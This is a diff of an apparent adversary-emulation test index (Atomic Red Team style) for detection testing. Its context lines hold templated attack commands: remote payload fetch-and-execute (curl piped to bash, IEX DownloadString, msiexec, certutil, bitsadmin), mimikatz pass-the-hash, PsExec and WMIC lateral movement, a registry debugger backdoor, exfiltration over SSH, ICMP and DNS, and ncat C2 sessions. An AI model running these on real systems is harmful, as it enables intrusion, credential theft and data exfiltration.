@@ -24613,12 +24613,12 @@ execution:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24630,12 +24630,12 @@ execution:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24654,11 +24654,11 @@ execution:
name: command_prompt
command: 'msiexec.exe /y "#{dll_payload}"
'
'
- name: Odbcconf.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24677,7 +24677,7 @@ execution:
name: command_prompt
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
'
'
- name: InfDefaultInstall.exe .inf Execution
description: |
Test execution of a .inf using InfDefaultInstall.exe
@@ -24702,7 +24702,7 @@ execution:
elevation_required: false
command: 'InfDefaultInstall.exe #{inf_to_execute}
'
'
T1216:
technique:
x_mitre_data_sources:
@@ -24759,7 +24759,7 @@ execution:
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24773,12 +24773,12 @@ execution:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
'
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24791,12 +24791,12 @@ execution:
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
'
- name: manage-bde.wsf Signed Script Command Execution
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24812,7 +24812,7 @@ execution:
cscript manage-bde.wsf
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
'
'
T1153:
technique:
x_mitre_data_sources:
@@ -24857,7 +24857,7 @@ execution:
- name: Execute Script using Source
description: 'Creates a script and executes it using the source command
'
'
supported_platforms:
- macos
- linux
@@ -24871,7 +24871,7 @@ execution:
description: 'Creates a script and executes it using the source command''s dot
alias
'
'
supported_platforms:
- macos
- linux
@@ -24941,7 +24941,7 @@ execution:
- name: Space After Filename
description: 'Space After Filename
'
'
supported_platforms:
- macos
executor:
@@ -25148,7 +25148,7 @@ execution:
- name: MSBuild Bypass Using Inline Tasks
description: 'Executes the code in a project file using. C# Example
'
'
supported_platforms:
- windows
input_arguments:
@@ -25168,7 +25168,7 @@ execution:
elevation_required: false
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
'
'
T1204:
technique:
x_mitre_data_sources:
@@ -25258,7 +25258,7 @@ execution:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
'
'
type: String
default: C:\Users\Public\art.jse
dependency_executor_name: powershell
@@ -25314,7 +25314,7 @@ execution:
cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
-Name ''AccessVBOM'' -ErrorAction Ignore
'
'
- name: OSTAP JS version
description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
\nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
@@ -25417,7 +25417,7 @@ execution:
- name: WMI Reconnaissance Users
description: 'WMI List User Accounts
'
'
supported_platforms:
- windows
executor:
@@ -25425,11 +25425,11 @@ execution:
elevation_required: false
command: 'wmic useraccount get /ALL
'
'
- name: WMI Reconnaissance Processes
description: 'WMI List Processes
'
'
supported_platforms:
- windows
executor:
@@ -25437,11 +25437,11 @@ execution:
elevation_required: false
command: 'wmic process get caption,executablepath,commandline
'
'
- name: WMI Reconnaissance Software
description: 'WMI List Software
'
'
supported_platforms:
- windows
executor:
@@ -25449,11 +25449,11 @@ execution:
elevation_required: false
command: 'wmic qfe get description,installedOn /format:csv
'
'
- name: WMI Reconnaissance List Remote Services
description: 'WMI List Remote Services
'
'
supported_platforms:
- windows
input_arguments:
@@ -25471,11 +25471,11 @@ execution:
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}
(%")
'
'
- name: WMI Execute Local Process
description: 'This test uses wmic.exe to execute a process on the local host.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25488,11 +25488,11 @@ execution:
elevation_required: false
command: 'wmic process call create #{process_to_execute}
'
'
- name: WMI Execute Remote Process
description: 'This test uses wmic.exe to execute a process on a remote host.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25509,7 +25509,7 @@ execution:
elevation_required: false
command: 'wmic /node:"#{node}" process call create #{process_to_execute}
'
'
T1028:
technique:
x_mitre_data_sources:
@@ -25574,7 +25574,7 @@ execution:
- name: Enable Windows Remote Management
description: 'Powershell Enable WinRM
'
'
supported_platforms:
- windows
executor:
@@ -25582,7 +25582,7 @@ execution:
elevation_required: true
command: 'Enable-PSRemoting -Force
'
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -25602,11 +25602,11 @@ execution:
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
'
- name: WMIC Process Call Create
description: 'Utilize WMIC to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -25629,11 +25629,11 @@ execution:
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
'
- name: Psexec
description: 'Utilize psexec to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -25653,11 +25653,11 @@ execution:
name: command_prompt
command: 'psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
'
'
- name: Invoke-Command
description: 'Execute Invoke-command on remote host
'
'
supported_platforms:
- windows
input_arguments:
@@ -25673,7 +25673,7 @@ execution:
name: powershell
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
'
'
T1220:
technique:
x_mitre_data_sources:
@@ -25769,7 +25769,7 @@ execution:
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25797,13 +25797,13 @@ execution:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: MSXSL Bypass using remote files
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25819,12 +25819,12 @@ execution:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: WMIC bypass using local XSL file
description: 'Executes the code specified within a XSL script using a local
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25847,12 +25847,12 @@ execution:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
'
'
- name: WMIC bypass using remote XSL file
description: 'Executes the code specified within a XSL script using a remote
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25868,7 +25868,7 @@ execution:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
'
'
lateral-movement:
T1155:
technique:
@@ -25938,7 +25938,7 @@ lateral-movement:
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\"
| python &""
'
'
'':
technique:
x_mitre_data_sources:
@@ -26055,7 +26055,7 @@ lateral-movement:
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
directory.
'
'
supported_platforms:
- windows
input_arguments:
@@ -26080,7 +26080,7 @@ lateral-movement:
- name: Scheduled Task Startup Script
description: 'Run an exe on user logon or system startup
'
'
supported_platforms:
- windows
executor:
@@ -26095,7 +26095,7 @@ lateral-movement:
- name: Logon Scripts - Mac
description: 'Mac logon script
'
'
supported_platforms:
- macos
executor:
@@ -26111,7 +26111,7 @@ lateral-movement:
description: 'vbs files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -26129,7 +26129,7 @@ lateral-movement:
description: 'jse files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -26147,7 +26147,7 @@ lateral-movement:
description: 'bat files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -26234,11 +26234,11 @@ lateral-movement:
name: command_prompt
command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
'
'
- name: crackmapexec Pass the Hash
description: 'command execute with crackmapexec
'
'
supported_platforms:
- windows
input_arguments:
@@ -26338,7 +26338,7 @@ lateral-movement:
- name: Mimikatz Kerberos Ticket Attack
description: 'Similar to PTH, but attacking Kerberos
'
'
supported_platforms:
- windows
input_arguments:
@@ -26354,7 +26354,7 @@ lateral-movement:
name: command_prompt
command: 'mimikatz # kerberos::ptt #{user_name}@#{domain}
'
'
T1076:
technique:
x_mitre_permissions_required:
@@ -26427,7 +26427,7 @@ lateral-movement:
- how to hijack RDS and RemoteApp sessions transparently to move through an
organization
'
'
supported_platforms:
- windows
executor:
@@ -26439,12 +26439,12 @@ lateral-movement:
net start sesshijack
cleanup_command: 'sc.exe delete sesshijack
'
'
- name: RDPto-DomainController
description: 'Attempt an RDP session via "Connect-RDP" to a system. Default
RDPs to (%logonserver%) as the current user
'
'
supported_platforms:
- windows
input_arguments:
@@ -26467,7 +26467,7 @@ lateral-movement:
elevation_required: false
command: 'Connect-RDP -ComputerName #{logonserver} -User #{username}
'
'
T1105:
technique:
x_mitre_data_sources:
@@ -26519,7 +26519,7 @@ lateral-movement:
- name: rsync remote file copy (push)
description: 'Utilize rsync to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -26544,11 +26544,11 @@ lateral-movement:
name: bash
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
'
'
- name: rsync remote file copy (pull)
description: 'Utilize rsync to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -26573,11 +26573,11 @@ lateral-movement:
name: bash
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
'
'
- name: scp remote file copy (push)
description: 'Utilize scp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -26602,11 +26602,11 @@ lateral-movement:
name: bash
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
'
'
- name: scp remote file copy (pull)
description: 'Utilize scp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -26631,11 +26631,11 @@ lateral-movement:
name: bash
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: sftp remote file copy (push)
description: 'Utilize sftp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -26660,11 +26660,11 @@ lateral-movement:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
'
'
- name: sftp remote file copy (pull)
description: 'Utilize sftp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -26689,12 +26689,12 @@ lateral-movement:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: certutil download (urlcache)
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -26711,12 +26711,12 @@ lateral-movement:
elevation_required: false
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
'
'
- name: certutil download (verifyctl)
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -26761,7 +26761,7 @@ lateral-movement:
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
HIGH #{remote_file} #{local_path}
'
'
- name: Windows - PowerShell Download
description: |
This test uses PowerShell to download a payload.
@@ -26782,15 +26782,15 @@ lateral-movement:
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
"#{destination_path}")
'
'
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
'
'
- name: OSTAP Worming Activity
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
This emulates the activity.
'
'
supported_platforms:
- windows
input_arguments:
@@ -26906,7 +26906,7 @@ lateral-movement:
- name: Map admin share
description: 'Connecting To Remote Shares
'
'
supported_platforms:
- windows
input_arguments:
@@ -26932,11 +26932,11 @@ lateral-movement:
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
/u:#{user_name}"
'
'
- name: Map Admin Share PowerShell
description: 'Map Admin share utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -26957,12 +26957,12 @@ lateral-movement:
elevation_required: false
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
'
'
- name: Copy and Execute File with PsExec
description: 'Copies a file to a remote host and executes it using PsExec. Requires
the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
'
'
supported_platforms:
- windows
input_arguments:
@@ -26979,7 +26979,7 @@ lateral-movement:
elevation_required: true
command: 'psexec.exe #{remote_host} -c #{command_path}
'
'
- name: Execute command writing output to local Admin Share
description: |
Executes a command, writing the output to a local Admin Share.
@@ -27001,7 +27001,7 @@ lateral-movement:
command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
2>&1
'
'
T1028:
technique:
x_mitre_data_sources:
@@ -27066,7 +27066,7 @@ lateral-movement:
- name: Enable Windows Remote Management
description: 'Powershell Enable WinRM
'
'
supported_platforms:
- windows
executor:
@@ -27074,7 +27074,7 @@ lateral-movement:
elevation_required: true
command: 'Enable-PSRemoting -Force
'
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -27094,11 +27094,11 @@ lateral-movement:
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
'
- name: WMIC Process Call Create
description: 'Utilize WMIC to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -27121,11 +27121,11 @@ lateral-movement:
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
'
- name: Psexec
description: 'Utilize psexec to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -27145,11 +27145,11 @@ lateral-movement:
name: command_prompt
command: 'psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
'
'
- name: Invoke-Command
description: 'Execute Invoke-command on remote host
'
'
supported_platforms:
- windows
input_arguments:
@@ -27165,7 +27165,7 @@ lateral-movement:
name: powershell
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
'
'
collection:
T1123:
technique:
@@ -27217,7 +27217,7 @@ collection:
elevation_required: false
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
'
'
T1119:
technique:
x_mitre_permissions_required:
@@ -27274,7 +27274,7 @@ collection:
- name: Automated Collection Command Prompt
description: 'Automated Collection
'
'
supported_platforms:
- windows
executor:
@@ -27285,7 +27285,7 @@ collection:
- name: Automated Collection PowerShell
description: 'Automated Collection
'
'
supported_platforms:
- windows
executor:
@@ -27294,11 +27294,11 @@ collection:
command: 'Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName
-destination c:\temp}
'
'
- name: Recon information for export with PowerShell
description: 'collect information for exfiltration
'
'
supported_platforms:
- windows
executor:
@@ -27315,7 +27315,7 @@ collection:
- name: Recon information for export with Command Prompt
description: 'collect information for exfiltration
'
'
supported_platforms:
- windows
executor:
@@ -27379,7 +27379,7 @@ collection:
- name: Utilize Clipboard to store or execute commands from
description: 'Add data to clipboard to copy off or execute commands from.
'
'
supported_platforms:
- windows
executor:
@@ -27391,12 +27391,12 @@ collection:
clip < %temp%\T1115.txt
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
'
'
- name: PowerShell
description: 'Utilize PowerShell to echo a command to clipboard and execute
it
'
'
supported_platforms:
- windows
executor:
@@ -27451,7 +27451,7 @@ collection:
description: 'Utilize powershell to download discovery.bat and save to a local
file
'
'
supported_platforms:
- windows
executor:
@@ -27460,12 +27460,12 @@ collection:
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
> pi.log
'
'
- name: Stage data from Discovery.sh
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script
'
'
supported_platforms:
- linux
- macos
@@ -27474,12 +27474,12 @@ collection:
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh
| bash -s > /tmp/discovery.log
'
'
- name: Zip a Folder with PowerShell for Staging in Temp
description: 'Use living off the land tools to zip a file and stage it in the
Windows temporary folder for later exfiltration.
'
'
supported_platforms:
- windows
executor:
@@ -27488,11 +27488,11 @@ collection:
command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
-DestinationPath $env:TEMP\Folder_to_zip.zip
'
'
cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
Ignore
'
'
'':
technique:
x_mitre_permissions_required:
@@ -27588,7 +27588,7 @@ collection:
description: 'This test uses `grep` to search a macOS Safari binaryCookies file
for specified values. This was used by CookieMiner malware.
'
'
supported_platforms:
- macos
input_arguments:
@@ -27689,7 +27689,7 @@ collection:
description: 'Search through local Outlook installation, extract mail, compress
the contents, and saves everything to a directory for later exfiltration.
'
'
supported_platforms:
- windows
input_arguments:
@@ -27703,10 +27703,10 @@ collection:
command: 'powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1
-file #{output_file}
'
'
cleanup_command: 'del #{output_file} >nul 2>&1
'
'
T1056:
technique:
x_mitre_data_sources:
@@ -27790,7 +27790,7 @@ collection:
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
'
'
T1113:
technique:
x_mitre_data_sources:
@@ -27846,7 +27846,7 @@ collection:
- name: Screencapture
description: 'Use screencapture command to collect a full desktop screenshot
'
'
supported_platforms:
- macos
input_arguments:
@@ -27861,7 +27861,7 @@ collection:
- name: Screencapture (silent)
description: 'Use screencapture command to collect a full desktop screenshot
'
'
supported_platforms:
- macos
input_arguments:
@@ -27877,7 +27877,7 @@ collection:
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
'
'
supported_platforms:
- linux
input_arguments:
@@ -27893,7 +27893,7 @@ collection:
- name: Import
description: 'Use import command to collect a full desktop screenshot
'
'
supported_platforms:
- linux
input_arguments:
@@ -28020,10 +28020,10 @@ exfiltration:
elevation_required: false
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
'
'
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore
'
'
- name: Compress Data for Exfiltration With Rar
description: "An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration \n"
@@ -28063,15 +28063,15 @@ exfiltration:
elevation_required: false
command: '"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
'
'
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
'
'
- name: Data Compressed - nix - zip
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard zip compression.
'
'
supported_platforms:
- linux
- macos
@@ -28095,18 +28095,18 @@ exfiltration:
elevation_required: false
prereq_command: 'ls #{input_files} > /dev/null
'
'
command: 'zip #{output_file} #{input_files}
'
'
cleanup_command: 'rm -f #{output_file}
'
'
- name: Data Compressed - nix - gzip Single File
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
'
'
supported_platforms:
- linux
- macos
@@ -28126,15 +28126,15 @@ exfiltration:
command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
>> #{input_file}; gzip -k #{input_file})
'
'
cleanup_command: 'rm -f #{input_file}.gz
'
'
- name: Data Compressed - nix - tar Folder or File
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
'
'
supported_platforms:
- linux
- macos
@@ -28157,10 +28157,10 @@ exfiltration:
elevation_required: false
command: 'tar -cvzf #{output_file} #{input_file_folder}
'
'
cleanup_command: 'rm -f #{output_file}
'
'
T1022:
technique:
x_mitre_data_sources:
@@ -28219,7 +28219,7 @@ exfiltration:
- name: Data Encrypted with zip and gpg symmetric
description: 'Encrypt data for exiltration
'
'
supported_platforms:
- macos
- linux
@@ -28239,7 +28239,7 @@ exfiltration:
ls -l
cleanup_command: 'rm -Rf /tmp/victim-files
'
'
- name: Compress Data and lock with password for Exfiltration with winrar
description: |
Note: Requires winrar installation
@@ -28296,7 +28296,7 @@ exfiltration:
- name: Compress Data and lock with password for Exfiltration with 7zip
description: 'Note: Requires 7zip installation
'
'
supported_platforms:
- windows
executor:
@@ -28357,7 +28357,7 @@ exfiltration:
- name: Data Transfer Size Limits
description: 'Take a file/directory, split it into 5Mb chunks
'
'
supported_platforms:
- macos
- linux
@@ -28454,7 +28454,7 @@ exfiltration:
elevation_required: false
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
'
'
- name: Exfiltration Over Alternative Protocol - SSH
description: |
Input a domain and test Exfiltration over SSH
@@ -28482,12 +28482,12 @@ exfiltration:
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
'
'
- name: Exfiltration Over Alternative Protocol - HTTP
description: 'A firewall rule (iptables or firewalld) will be needed to allow
exfiltration on port 1337.
'
'
supported_platforms:
- macos
- linux
@@ -28510,7 +28510,7 @@ exfiltration:
- name: Exfiltration Over Alternative Protocol - ICMP
description: 'Exfiltration of specified file over ICMP protocol.
'
'
supported_platforms:
- windows
input_arguments:
@@ -28529,11 +28529,11 @@ exfiltration:
in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
1500, $Data) }
'
'
- name: Exfiltration Over Alternative Protocol - DNS
description: 'Exfiltration of specified file over DNS protocol.
'
'
supported_platforms:
- linux
input_arguments:
@@ -28692,7 +28692,7 @@ command-and-control:
name: sh
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
'
'
cleanup_command: |
unset http_proxy
unset https_proxy
@@ -28787,7 +28787,7 @@ command-and-control:
- name: Base64 Encoded data.
description: 'Utilizing a common technique for posting base64 encoded data.
'
'
supported_platforms:
- macos
- linux
@@ -28925,7 +28925,7 @@ command-and-control:
- name: rsync remote file copy (push)
description: 'Utilize rsync to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -28950,11 +28950,11 @@ command-and-control:
name: bash
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
'
'
- name: rsync remote file copy (pull)
description: 'Utilize rsync to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -28979,11 +28979,11 @@ command-and-control:
name: bash
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
'
'
- name: scp remote file copy (push)
description: 'Utilize scp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -29008,11 +29008,11 @@ command-and-control:
name: bash
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
'
'
- name: scp remote file copy (pull)
description: 'Utilize scp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -29037,11 +29037,11 @@ command-and-control:
name: bash
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: sftp remote file copy (push)
description: 'Utilize sftp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -29066,11 +29066,11 @@ command-and-control:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
'
'
- name: sftp remote file copy (pull)
description: 'Utilize sftp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -29095,12 +29095,12 @@ command-and-control:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: certutil download (urlcache)
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -29117,12 +29117,12 @@ command-and-control:
elevation_required: false
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
'
'
- name: certutil download (verifyctl)
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -29167,7 +29167,7 @@ command-and-control:
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
HIGH #{remote_file} #{local_path}
'
'
- name: Windows - PowerShell Download
description: |
This test uses PowerShell to download a payload.
@@ -29188,15 +29188,15 @@ command-and-control:
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
"#{destination_path}")
'
'
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
'
'
- name: OSTAP Worming Activity
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
This emulates the activity.
'
'
supported_platforms:
- windows
input_arguments:
@@ -29345,7 +29345,7 @@ command-and-control:
"#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
-QuickTimeout}
'
'
- name: DNS Regular Beaconing
description: |
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
@@ -29437,7 +29437,7 @@ command-and-control:
- name: OSTap Payload Download
description: 'Uses cscript //E:jscript to download a file
'
'
supported_platforms:
- windows
input_arguments:
@@ -29457,7 +29457,7 @@ command-and-control:
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
'
T1032:
technique:
x_mitre_data_sources:
@@ -29668,7 +29668,7 @@ command-and-control:
elevation_required: false
command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
'
'
- name: Powercat C2
description: "Start C2 Session Using Powercat\nTo start the listener on a Linux
device, type the following: \nnc -l -p <port>\n"
@@ -29733,7 +29733,7 @@ command-and-control:
- name: Testing usage of uncommonly used port with PowerShell
description: 'Testing uncommonly used port utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -29750,11 +29750,11 @@ command-and-control:
elevation_required: false
command: 'test-netconnection -ComputerName #{domain} -port #{port}
'
'
- name: Testing usage of uncommonly used port
description: 'Testing uncommonly used port utilizing telnet.
'
'
supported_platforms:
- linux
- macos
@@ -29772,7 +29772,7 @@ command-and-control:
elevation_required: false
command: 'telnet #{domain} #{port}
'
'
T1102:
technique:
x_mitre_permissions_required:
@@ -29839,7 +29839,7 @@ command-and-control:
- name: Reach out to C2 Pointer URLs via command_prompt
description: 'Download data from a public website using command line
'
'
supported_platforms:
- windows
executor:
@@ -29848,14 +29848,14 @@ command-and-control:
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
%TEMP%\bitsadmindownload.html
'
'
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
'
'
- name: Reach out to C2 Pointer URLs via powershell
description: 'Multiple download methods for files using powershell
'
'
supported_platforms:
- windows
executor: